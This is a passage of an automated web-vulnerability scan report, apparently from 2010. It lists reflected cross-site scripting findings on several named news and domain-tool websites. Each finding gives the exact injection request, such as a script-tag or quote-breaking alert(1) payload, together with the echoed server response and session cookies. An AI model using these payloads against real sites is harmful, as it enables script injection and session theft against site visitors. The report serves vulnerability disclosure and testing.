...[SNIP]...

1.9. http://www.canada.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.canada.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f46'%3balert(1)//9b6decae86e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5f46';alert(1)//9b6decae86e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d5f46'%3balert(1)//9b6decae86e=1 HTTP/1.1
Host: www.canada.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 272523
Expires: Sun, 19 Dec 2010 03:08:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:07 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=1camde55elyruhzm0d0hya45; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
acebook/poll.html';
   var bundle_id = '';
   var question = 'Is an e-mail a good enough substitute for a Christmas card?';
   var voted = 'False';
   var poll_url = 'http://www.canada.com/facebook/poll.html?d5f46';alert(1)//9b6decae86e=1&qid=106525';
   var poll_topic = 'Christmas cards';
   var encoded_poll_url = 'http%3a%2f%2fwww.canada.com%2ffacebook%2fpoll.html%3fd5f46'%3balert(1)%2f%2f9b6decae86e%3d1%26qid%3d106525';
   var host = 'h
...[SNIP]...

1.10. http://www.cheap-registrar.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cheap-registrar.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d254"><script>alert(1)</script>ad40d2e47f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5d254"><script>alert(1)</script>ad40d2e47f1=1 HTTP/1.1
Host: www.cheap-registrar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 03:07:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 738

<html><head>
<meta name="DESCRIPTION" content="DomainsTools and Cheap Registrar help you get started in the Domain business.">
<title>$1.99 Registrations at Cheap Registrar</title></head>
<!-- Redirec
...[SNIP]...
<a href="http://www.securepaynet.net/5d254"><script>alert(1)</script>ad40d2e47f1=1">
...[SNIP]...

1.11. http://www.cheap-registrar.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cheap-registrar.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2ea"><script>alert(1)</script>6b27097126 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3a2ea"><script>alert(1)</script>6b27097126=1 HTTP/1.1
Host: www.cheap-registrar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 03:07:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 736

<html><head>
<meta name="DESCRIPTION" content="DomainsTools and Cheap Registrar help you get started in the Domain business.">
<title>$1.99 Registrations at Cheap Registrar</title></head>
<!-- Redirec
...[SNIP]...
<frame src="http://www.securepaynet.net/3a2ea"><script>alert(1)</script>6b27097126=1" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0>
...[SNIP]...

1.12. http://www.domaintools.com/products/history-block.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /products/history-block.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df587<a>ce53c9e6599 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /products/df587<a>ce53c9e6599 HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Dec 2010 04:07:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 19 Dec 2010 03:07:47 GMT
Content-Length: 6763
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
   <title>Domain Tools: Page Not Found</title>
   
<link rel="alternate" type="applicati
...[SNIP]...
<a>ce53c9e6599">Whois record for "df587<a>ce53c9e6599"</a>
...[SNIP]...

1.13. http://www.domaintools.com/products/reports/reverse-ip.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /products/reports/reverse-ip.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa5d8<a>c0b22e683b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /products/reports/aa5d8<a>c0b22e683b3 HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Dec 2010 03:58:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 19 Dec 2010 02:58:11 GMT
Content-Length: 6773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
   <title>Domain Tools: Page Not Found</title>
   
<link rel="alternate" type="applicati
...[SNIP]...
<a>c0b22e683b3">Whois record for "aa5d8<a>c0b22e683b3"</a>
...[SNIP]...

1.14. http://www.domaintools.com/products/units.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /products/units.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc9b4<a>517b058ca68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /products/fc9b4<a>517b058ca68 HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Dec 2010 04:07:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 19 Dec 2010 03:07:47 GMT
Content-Length: 6763
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
   <title>Domain Tools: Page Not Found</title>
   
<link rel="alternate" type="applicati
...[SNIP]...
<a>517b058ca68">Whois record for "fc9b4<a>517b058ca68"</a>
...[SNIP]...

1.15. http://www.domaintools.com/reverse-ip/explorer.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /reverse-ip/explorer.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34784<a>3c620300a71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /reverse-ip/34784<a>3c620300a71 HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Dec 2010 04:07:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 19 Dec 2010 03:07:32 GMT
Content-Length: 6765
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
   <title>Domain Tools: Page Not Found</title>
   
<link rel="alternate" type="applicati
...[SNIP]...
<a>3c620300a71">Whois record for "34784<a>3c620300a71"</a>
...[SNIP]...

1.16. http://www.financialpost.com/16994.rss [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /16994.rss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c848'%3bf5e376ba32d was submitted in the REST URL parameter 1. This input was echoed as 2c848';f5e376ba32d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2c848'%3bf5e376ba32d HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42972


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/2c848';f5e376ba32d/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=2c848';f5e376ba32d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=91390696?">
...[SNIP]...

1.17. http://www.financialpost.com/17052.rss [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /17052.rss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce9a4'%3b247ade30c83 was submitted in the REST URL parameter 1. This input was echoed as ce9a4';247ade30c83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ce9a4'%3b247ade30c83 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42972


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/ce9a4';247ade30c83/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=ce9a4';247ade30c83;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17499618?">
...[SNIP]...

1.18. http://www.financialpost.com/17082.rss [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /17082.rss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c4e2'%3bd9af8f915db was submitted in the REST URL parameter 1. This input was echoed as 9c4e2';d9af8f915db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9c4e2'%3bd9af8f915db HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42972


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/9c4e2';d9af8f915db/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=9c4e2';d9af8f915db;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=24606352?">
...[SNIP]...

1.19. http://www.financialpost.com/906070.rss [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /906070.rss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cf31'%3bc915d077dc3 was submitted in the REST URL parameter 1. This input was echoed as 7cf31';c915d077dc3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /7cf31'%3bc915d077dc3 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42973


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/7cf31';c915d077dc3/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=7cf31';c915d077dc3;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99344879?">
...[SNIP]...

1.20. http://www.financialpost.com/917156.rss [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /917156.rss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aa69'%3be60d6f1c0da was submitted in the REST URL parameter 1. This input was echoed as 4aa69';e60d6f1c0da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4aa69'%3be60d6f1c0da HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42973


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/4aa69';e60d6f1c0da/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=4aa69';e60d6f1c0da;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=11025153?">
...[SNIP]...

1.21. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/idms_styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4855a'%3bc818f85888d was submitted in the REST URL parameter 1. This input was echoed as 4855a';c818f85888d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets4855a'%3bc818f85888d/css/idc/idms_styles.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:24 GMT
Date: Sun, 19 Dec 2010 03:03:24 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43354


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets4855a';c818f85888d/css/idc/idms_styles;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets4855a';c818f85888d;kw=css;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=39186833?">
...[SNIP]...

1.22. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/idms_styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c40c4'%3bad7596597dc was submitted in the REST URL parameter 2. This input was echoed as c40c4';ad7596597dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/cssc40c4'%3bad7596597dc/idc/idms_styles.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:29 GMT
Date: Sun, 19 Dec 2010 03:03:29 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43318


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/cssc40c4';ad7596597dc/idc/idms_styles;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=cssc40c4';ad7596597dc;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=82870670?">
...[SNIP]...

1.23. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/idms_styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b313'%3b698c4e0738c was submitted in the REST URL parameter 3. This input was echoed as 1b313';698c4e0738c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/css/idc1b313'%3b698c4e0738c/idms_styles.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:34 GMT
Date: Sun, 19 Dec 2010 03:03:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43281


...[SNIP]...
